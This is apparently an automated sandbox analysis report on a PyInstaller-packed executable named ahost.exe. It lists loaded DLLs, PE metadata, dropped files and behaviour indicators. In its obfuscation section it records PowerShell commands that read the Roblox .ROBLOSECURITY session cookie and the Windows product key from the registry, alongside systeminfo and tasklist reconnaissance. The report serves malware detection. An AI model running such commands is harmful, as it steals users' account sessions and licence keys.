Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ahost.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ahost.exe

Static file information: File size 7967812 > 1048576

Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ahost.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ahost.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: ahost.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: ahost.exe, 00000002.00000002.1877240019.00007FF8E7207000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: ahost.exe, 00000002.00000002.1875848363.00007FF8E6AD2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1882674350.00007FF8F8324000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1875848363.00007FF8E6B6A000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000068.00000000.1738525769.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdb source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: ahost.exe, 00000002.00000002.1883107537.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: ahost.exe, 00000002.00000002.1881541299.00007FF8E83E1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: ahost.exe, 00000002.00000002.1881203499.00007FF8E8381000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: ahost.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: ahost.exe, 00000002.00000002.1882883847.00007FF8F8CA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.pdbhPh source: powershell.exe, 00000046.00000002.1646857023.0000017B02BE1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: ahost.exe, 00000002.00000002.1880925257.00007FF8E824B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: ahost.exe, 00000002.00000002.1882291196.00007FF8F7A91000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: ahost.exe, 00000002.00000002.1881902584.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: ahost.exe, 00000002.00000002.1880634708.00007FF8E8201000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1877729374.00007FF8E72A5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: oh.pdb. source: powershell.exe, 00000046.00000002.1723901604.0000017B19878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: ahost.exe, ahost.exe, 00000002.00000002.1878181431.00007FF8E72FE000.00000040.00000001.01000000.0000000E.sdmp

Source: ahost.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ahost.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ahost.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ahost.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ahost.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"

Source: python313.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1cb64b
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1f35a
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x46d69
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xdba7
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x17cae
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa8f8a
Source: ohbt5slp.dll.82.dr	Static PE information: real checksum: 0x0 should be: 0xd287
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x197f77
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11959
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a226
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1fcc8
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xdd74
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x4330c
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x7797
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x21293
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x15eca
Source: ahost.exe	Static PE information: real checksum: 0x799bab should be: 0x79f425

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF884F7D2A5 pushad ; iretd	12_2_00007FF884F7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF88509860D push ebx; ret	12_2_00007FF88509860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8850985FD push ebx; ret	12_2_00007FF88509860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF885098448 push ebx; ret	12_2_00007FF88509847A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FF8850900BD pushad ; iretd	12_2_00007FF8850900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 70_2_00007FF8867000BD pushad ; iretd	70_2_00007FF8867000C1

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\ahost.exe

Process created: "C:\Users\user\Desktop\ahost.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd	Jump to dropped file
